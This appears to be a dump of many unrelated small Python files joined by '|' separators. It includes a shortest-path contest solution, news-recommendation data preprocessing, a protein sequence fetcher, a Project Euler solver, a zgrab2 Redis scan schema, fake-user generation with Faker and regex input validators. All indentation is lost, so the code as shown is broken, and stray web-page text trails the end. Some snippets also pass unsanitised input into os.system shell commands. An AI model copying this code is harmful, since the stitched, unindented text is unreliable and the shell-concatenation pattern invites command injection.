for line in reverse_readline(filename):
if regex_ok.search(line):
return Status.up
elif regex_bad.search(line):
return Status.down
return Status.unknown
|
import sys
sys.setrecursionlimit(10000)
def root(x):
p = x
while p != b[p]:
p = b[p]
b[x] = p
return p
def dijkstra(x, y):
dist = [sys.maxint]*(n+1)
prev = [None]*(n+1)
vis = [False]*(n+1)
dist[x] = 0
while True:
minp, mind = -1, sys.maxint
for i in range(1, n+1):
if not vis[i] and dist[i] < mind:
mind = dist[i]
minp = i
if minp == y:
break
vis[minp] = True
for i in range(1, n+1):
if c[minp][i] > 0 and dist[i] > mind + c[minp][i]:
dist[i] = mind + c[minp][i]
prev[i] = minp
path = []
tmp = y
while prev[tmp] != None:
path.append(tmp)
tmp = prev[tmp]
path.append(x)
return dist[y], path
while True:
line = sys.stdin.readline()
if line.strip() == '-1':
break
n, m = [int(x) for x in line.split()]
a = []
for i in range(m):
a.append([int(x) for x in sys.stdin.readline().split()])
a.sort(key=lambda x: x[2])
b = [x for x in range(n+1)]
c = [[0]*(n+1) for x in range(n+1)]
min_path = 'No solution.'
min_dist = sys.maxint
count, lower = 0, 0
for x, y, z in a:
if c[x][y] > 0:
continue
count += 1
if count < 3:
lower += z
elif min_dist <= lower + z:
break
rx, ry = root(x), root(y)
if rx == ry:
dist, path = dijkstra(x, y)
if dist + z < min_dist:
min_dist = dist + z
min_path = ' '.join([str(i) for i in path])
else:
b[ry] = rx
c[x][y] = z
c[y][x] = z
print min_path
|
import numpy as np
import json
import os
import random
from config import Config
def preprocess_user_data(filename):
print("Preprocessing user data...")
browsed_news = []
impression_news = []
with open(filename, "r") as f:
data = f.readlines()
random.seed(212)
random.shuffle(data)
use_num = int(len(data) * 1)
use_data = data[:use_num]
for l in use_data:
userID, time, history, impressions = l.strip('\n').split('\t')
history = history.split()
browsed_news.append(history)
impressions = [x.split('-') for x in impressions.split()]
impression_news.append(impressions)
impression_pos = []
impression_neg = []
for impressions in impression_news:
pos = []
neg = []
for news in impressions:
if int(news[1]) == 1:
pos.append(news[0])
else:
neg.append(news[0])
impression_pos.append(pos)
impression_neg.append(neg)
all_browsed_news = []
all_click = []
all_unclick = []
all_candidate = []
all_label = []
for k in range(len(browsed_news)):
browsed = browsed_news[k]
pos = impression_pos[k]
neg = impression_neg[k]
for pos_news in pos:
all_browsed_news.append(browsed)
all_click.append([pos_news])
neg_news = random.sample(neg, Config.neg_sample)
all_unclick.append(neg_news)
all_candidate.append([pos_news]+neg_news)
all_label.append([1] + [0] * Config.neg_sample)
print('original behavior: ', len(browsed_news))
print('processed behavior: ', len(all_browsed_news))
return all_browsed_news, all_click, all_unclick, all_candidate, all_label
def preprocess_test_user_data(filename):
print("Preprocessing test user data...")
with open(filename, 'r') as f:
data = f.readlines()
random.seed(212)
random.shuffle(data)
use_num = int(len(data) * 0.1)
use_data = data[:use_num]
impression_index = []
user_browsed_test = []
all_candidate_test = []
all_label_test = []
user_index = {}
all_user_test = []
for l in use_data:
userID, time, history, impressions = l.strip('\n').split('\t')
if userID not in user_index:
user_index[userID] = len(user_index)
history = history.split()
user_browsed_test.append(history)
impressions = [x.split('-') for x in impressions.split()]
begin = len(all_candidate_test)
end = len(impressions) + begin
impression_index.append([begin, end])
for news in impressions:
all_user_test.append(userID)
all_candidate_test.append([news[0]])
all_label_test.append([int(news[1])])
print('test samples: ', len(all_label_test))
print('Found %s unique users.' % len(user_index))
return impression_index, user_index, user_browsed_test, all_user_test, all_candidate_test, all_label_test
|
import os
import sys
import re
from Bio import SeqIO
class IPIHandler:
def strip_html(self):
ifh = open(self.seq_file, 'r')
lines = ifh.readlines()
ifh.close()
ofh = open(self.seq_file, 'w')
for line in lines:
subline = re.sub(r'<[^>]*?>', '', line)
ofh.write(subline)
def __init__(self, ipi_code=None):
url = "http://srs.ebi.ac.uk/srsbin/cgi-bin/wgetz?-e+[IPI-acc:"+ipi_code+"]+-vn+2"
os.system('wget -o wget-log --output-document=seq/'+ipi_code+'.seq '+url)
self.seq_file = 'seq/'+ipi_code+'.seq'
self.strip_html()
handle = open('seq/'+ipi_code+'.seq')
try:
self.record = SeqIO.read(handle, 'swiss')
except ValueError:
raise
def getSequence(self):
return self.record.seq
def getSequenceID(self):
return self.record.id
def getSequenceLength(self):
return len(self.record.seq)
def getSequenceXRefs(self):
return self.record.dbxrefs
|
"""
This file contains functions dealing with JSON.
"""
import json
import os
import pathlib
from config import PROCEESED_DIR
def write_json(object: dict, filename: str) -> None:
pathlib.Path(PROCEESED_DIR).mkdir(parents=True, exist_ok=True)
outpath = os.path.join(PROCEESED_DIR, f'{filename}.json')
with open(outpath, 'w') as fp:
json.dump(object, fp)
|
import unittest
import chemical_elements as E
class TestChemicalElements(unittest.TestCase):
def test_count(self):
N = 118
self.assertEqual(len(E.ELEMENTS), N)
self.assertEqual([e.number for e in E.ELEMENT_LIST], range(1, N + 1))
def test_tritium(self):
self.assertTrue("T" not in E.ELEMENTS)
def test_weights_are_numbers(self):
bad = []
for e in E.ELEMENT_LIST:
try:
float(e.weight)
except ValueError:
bad.append((e.symbol, e.weight))
self.assertEqual(bad, [])
if __name__ == "__main__":
unittest.main()
|
################################################################################
# Cristian Alexandrescu #
# 2163013577ba2bc237f22b3f4d006856 #
# 11a4bb2c77aca6a9927b85f259d9af10db791ce5cf884bb31e7f7a889d4fb385 #
# bc9a53289baf23d369484f5343ed5d6c #
################################################################################
import math
def IsPrime(n, Primes):
lim = int(math.sqrt(n));
for i in range(0, len(Primes)):
if Primes[i] > lim:
break;
if n % Primes[i] == 0:
return False;
return True;
def GenPrimes(Limit):
Primes = [2, 3, 5, 7, 11];
for i in range(13, Limit, 2):
if IsPrime(i, Primes):
Primes.append(i);
return Primes;
def GenCirculars(n):
NoDigits = len(str(n));
list = [n];
for i in range(1, NoDigits):
r = n % 10;
n = int(n / 10) + r * (10 ** (NoDigits - 1))
list.append(n);
return list;
def Solve():
Primes = GenPrimes(1000000);
Primes = set(Primes);
Sol = 0;
for p in Primes:
#print(p);
list = GenCirculars(p);
Circular = True;
for pp in list:
if pp not in Primes:
Circular = False;
if Circular:
print("Circular ", p);
Sol = Sol + 1;
print(Sol);
print ("PROJECT EULER 035:");
Solve(); |
# zschema sub-schema for zgrab2's redis module
# Registers zgrab2-redis globally, and redis with the main zgrab2 schema.
from zschema.leaves import *
from zschema.compounds import *
import zschema.registry
import zcrypto_schemas.zcrypto as zcrypto
import zgrab2
redis_scan_response = SubRecord({
"result": SubRecord({
"commands": ListOf(String(), doc="The list of commands actually sent to the server, serialized in inline format, like 'PING' or 'AUTH somePassword'."),
"raw_command_output": ListOf(Binary(), doc="The raw output returned by the server for each command sent; the indices match those of commands."),
"ping_response": String(doc="The response from the PING command; should either be \"PONG\" or an authentication error.", examples=[
"PONG",
"(Error: NOAUTH Authentication required.)",
]),
"info_response": String(doc="The response from the INFO command. Should be a series of key:value pairs separated by CRLFs.", examples=[
"# Server\r\nredis_version:4.0.7\r\nkey2:value2\r\n",
"(Error: NOAUTH Authentication required.)",
]),
"auth_response": String(doc="The response from the AUTH command, if sent."),
"nonexistent_response": String("The response from the NONEXISTENT command.", examples=[
"(Error: ERR unknown command 'NONEXISTENT')",
]),
"quit_response": String(doc="The response to the QUIT command.", examples=["OK"]),
"version": String(doc="The version string, read from the the info_response (if available)."),
})
}, extends=zgrab2.base_scan_response)
zschema.registry.register_schema("zgrab2-redis", redis_scan_response)
zgrab2.register_scan_response_type("redis", redis_scan_response)
|
import sys
class Error(BaseException):
pass
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
class VariableTypeException(Exception):
def __init__(self, expected, actual, pos):
print(FAIL + 'Unexpected type expected: %s, actual: %s. Position %s' % (expected, actual, pos) + ENDC)
sys.exit(-1)
class UnknownVariableException(Exception):
def __init__(self, variable, pos):
print(FAIL + 'Unknown variable %s. Position %s' % (variable, pos) + ENDC)
sys.exit(-1)
class BinaryTypeException(Exception):
def __init__(self, left, right, operand, pos):
print(FAIL + 'Unexpected binary operand %s, between: %s and %s. Position %s' % (operand, left, right, pos) + ENDC)
sys.exit(-1)
class UnaryTypeException(Exception):
def __init__(self, expr, operand, pos):
print(FAIL + 'Unexpected unary operand %s, for %s. Position %s' % (operand, expr, pos) + ENDC)
sys.exit(-1)
class NotImplementedYetExeption(Exception):
def __init__(self, func, node):
print(FAIL + 'For %s Function %s is not implemented' % (func, node) + ENDC)
sys.exit(-1)
class UnknownStatementException(Exception):
def __init__(self, stmt):
print(FAIL + 'Unknown statement %s' % type(stmt) + ENDC)
sys.exit(-1)
|
class User:
def __init__(self,name,engagement) :
self.name=name;
self.engagement=engagement;
def __repr__(self) :
return f'<User {self.name}>'
def get_user_score(user):
try:
perform_calculation(user.engagement)
except KeyError:
print("Incorrect values provided to our calculation function")
else:
print( perform_calculation(user.engagement) )
if (perform_calculation(user.engagement) >500):
send_notification(user)
def perform_calculation(metrics):
return metrics['clicks']*5+metrics["hits"]*2
def send_notification(user):
print(f'Notification sent to {user}')
my_user=User('Rolf',{'clicks':151,'hits':399})
# my_user=User("Rosie",{'click':151})
get_user_score(my_user) |
from faker import Faker
import sqlite3 as sqlite
# ===========================================================
# Step 3: Create 2000 users
# Step 4: The users should have the same areas as facebook register
#
# This is a demo application in order to show how to creating
# fake user data, based on facebook.com register template
# mailto:ali.pala@ymail.com
# ===========================================================
class PopulateUser:
"""Populate 2000 users and store their data in the db"""
def fake_user_populate(self):
try:
# location provider
fake = Faker('en_US')
# Create a connection
# Data will be stored in fake.db
con = sqlite.connect('fake.db')
cur = con.cursor()
# Remove the table in the database,
cur.execute("DROP TABLE IF EXISTS users")
# Create users table
cur.execute("CREATE TABLE users(id INT, first_name TEXT, last_name TEXT, sex TEXT, mail TEXT, "
"password TEXT, birth_date date, tel TEXT, image TEXT)")
with con:
for _ in range(1000):
# Creating a dictionary to store the data as key value pair
user_profile_dict = fake.simple_profile()
# Keys are used as a column names
columns = ', '.join(user_profile_dict.keys())
placeholders = ', '.join('?' * len(user_profile_dict))
sql = 'INSERT INTO users ({}) VALUES ({})'.format(columns, placeholders)
# Insert data
cur.execute(sql, tuple(user_profile_dict.values()))
# Save (commit) the changes
con.commit()
except Exception as e:
raise
print("There is something wrong", e)
if __name__ == '__main__':
p = PopulateUser()
p.fake_user_populate()
|
# -*- coding:utf-8 -*-
"""
判断是否为回文数(反转后与原数字相同)
@author:dell
@file: Day06_01.py
@time: 2020/01/08
"""
def reverse_num(num):
result = 0
while num > 0:
result = result * 10 + num % 10
num = num // 10
return result
def is_palindrome(num):
return reverse_num(num) == num
if __name__ == '__main__':
r = is_palindrome(10)
print(r)
|
"""
Move all the top level files into a folder of the same name.
"""
import os
import shutil, json
def main():
tops = set()
pairs = {}
content = 'content'
for top, dirs, files in os.walk(content):
for filepath in files:
path, fne = os.path.split(filepath)
fn, ext = os.path.splitext(fne)
tops.add(fn)
if (fn in pairs) is False:
pairs[fn] = ()
pairs[fn] += (os.path.join(top, filepath), )
for folder in tops:
root = os.path.join(content, folder, )
os.makedirs(root)
files = pairs.get(folder, ())
for filepath in files:
old = filepath
path, fne = os.path.split(filepath)
new_loc = os.path.join(root, fne)
print('Moving', old, new_loc)
shutil.move(old, new_loc)
data = dict(
root=root,
files=files,
)
cpath = os.path.join(root, 'info.json')
with open(cpath, 'w') as stream:
json.dump(data, stream)
if __name__ == '__main__':
main()
|
from src.Annuity import Annuity
if __name__ == "__main__":
annuity_cal_0 = Annuity(2400, 2.3, 15, 12)
annuity_cal_1 = Annuity(2400, 2.5, 20, 12)
annuity_cal_2 = Annuity(2400, 3.0, 30, 12)
print(f'15 year total is {annuity_cal_0.get_pv_ordinary_annuity()}, \n'
f'20 year total is {annuity_cal_1.get_pv_ordinary_annuity()}, \n'
f'30 year total is {annuity_cal_2.get_pv_ordinary_annuity()} \n')
|
import math
sum = 1
N = 100
for i in range(1, N+1):
sum *= i
ans = 0
while(sum != 0):
(sum, mod) = divmod(sum, 10)
ans += mod
print(ans) |
fin = open('input.txt', 'r', encoding='utf8')
words = fin.readlines()
wSet = set()
for elem in words:
for word in elem.split():
wSet.add(word)
print(len(wSet))
|
"""
Select 25 random files from the results of a processing stage from a corpus.
Usage:
$ python select-random-files.py CORPUS STAGE
Writes results to a directory random/CORPUS-STAGE. All files are unzipped.
Example:
$ python select-random-sample.py \
/home/j/corpuswork/fuse/FUSEData/corpora/ln-cn-all-600k/subcorpora/1999 d2_seg
"""
import os, sys, glob, random
corpus = sys.argv[1]
stage = sys.argv[2]
COUNT = 25
corpus_name = os.path.basename(corpus)
files_dir = os.path.join(corpus, 'data', stage, '01', 'files')
results_dir = os.path.join('random', "%s-%s" % (corpus_name, stage))
print "Selecting from", files_dir
file_list = glob.glob("%s/????/*" % files_dir)
random.shuffle(file_list)
print "Collected", len(file_list), 'files'
print "Writing to", results_dir
os.mkdir(results_dir)
for fname in file_list[:COUNT]:
(year, basename) = fname.split(os.sep)[-2:]
print ' ', year, basename
#print "cp %s %s/%s-%s" % (fname, results_dir, year, basename)
os.system("cp %s %s/%s-%s" % (fname, results_dir, year, basename))
os.system("gunzip %s/*.gz" % results_dir)
|
class File:
def __init__(self, file_name, option):
self.file = open(file_name, option)
def read_lines(self):
return self.file.readlines()
def write_lines(self, lines):
return self.file.writelines(lines)
def __del__(self):
self.file.close() |
rec=[]
def f1(label):
print(label)
f=open("tancrend.txt","r")
for sor in f:
if sor[-1]=="\n":
sor=sor[:-1].split(";")
else:
sor=sor.split(";")
rec.append([sor[0],sor[1],sor[2]])
txt="A fájl beolvasása...kész!"
print("\t"+txt)
txt=rec[0][0]
print("\t"+txt)
txt=rec[-1][0]
print("\t"+txt)
def f2(label):
print(label)
c=0
for i in range(len(rec)):
if rec[i][0]=="samba":
c+=1
txt=rec[i][1]+", "+rec[i][2]
print("\t"+txt)
txt=str(c)+" pár mutatta be a sambát."
print("\t"+txt)
def f3(label):
print(label)
for i in range(len(rec)):
if rec[i][1]=="Vilma":
txt=rec[i][0]
print("\t"+txt)
def f4(label):
print(label)
txt="Kérek egy táncot (cha-cha, salsa, rumba, samba, jive, tango, bachata): "
tanc=input(txt)
par=[]
for i in range(len(rec)):
if rec[i][0]==tanc and rec[i][1]=="Vilma":
par.append(rec[i][2])
txt="A "+tanc+" bemutatóján Vilma párja "+par[0]+" volt."
elif par==[]:
txt="Vilma nem táncolt "+tanc+"-t."
print("\t"+txt)
def f5(label):
print(label)
girls=[]
boys=[]
nevek=[]
f=open("szereplok.txt","w")
for i in range(len(rec)):
nevek.append(rec[i][1])
girls=sorted(set(nevek))
txt="Lányok: "
for _ in range(len(girls)):
txt=txt+girls[_]+", "
print("\t"+txt[:-2])
f.write(txt[:-2]+"\n")
nevek=[]
for i in range(len(rec)):
nevek.append(rec[i][2])
boys=sorted(set(nevek))
txt="Fiúk: "
for _ in range(len(boys)):
txt=txt+boys[_]+", "
print("\t"+txt[:-2])
f.write(txt[:-2])
txt="A szereplok.txt fájl kiírása...kész!"
print("\t"+txt)
f1("1. feladat")
f2("2. feladat")
f3("3. feladat")
f4("4. feladat")
f5("5. feladat") |
import re
from validation_exception import ValidationException
class UserRegisteration:
NAME_PATTERN=r'^[A-Z][a-z]{2,20}'
MOBILE_PATTERN=r'[0-9]{2}[ ][0-9]{10}$'
EMAIL_PATTERN=r'^[a-z]{1}[a-z0-9]{1,}[.|_|+|-]?[a-z0-9]{1,}?@[a-z0-9]{1,}[.][a-z]{2,4}([.][a-z]{2})?$'
PASSWORD_PATTERN=r'(?=.*?[A-Z])(?=.*?[\d])(?=.*?[^#|?|!|@|$|%|^|&|*|-]*[^#|?|!|@|$|%|^|&|*|-][#|?|!|@|$|%|^|&|*|-]*$)[a-zA-Z0-9#^?!@$%^&*-]{8,}'
#check for name validation
def check_name_validation(self,name):
try:
self.pattern=re.match(self.NAME_PATTERN,name)
if self.pattern[0]==name:
print("Valid name")
return True
except:
raise ValidationException("Invalid Name")
#check for mobile validation
def check_mobile_validation(self,mobile):
try:
self.pattern=re.match(self.MOBILE_PATTERN,mobile)
if self.pattern[0]==mobile:
print("Valid Mobile Number")
return True
except:
raise ValidationException("Invalid Mobile Number")
#check for email validation
def check_email_validation(self,email):
try:
self.pattern=re.match(self.EMAIL_PATTERN,email)
if self.pattern[0]==email:
print("Valid Email Address")
return True
except:
raise ValidationException("Invalid Email Address")
return False
#check for password validation
def check_password_validation(self,password):
try:
self.pattern=re.match(self.PASSWORD_PATTERN,password)
if self.pattern[0]==password:
print("Valid Password")
return True
except:
raise ValidationException("Invalid Password")
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.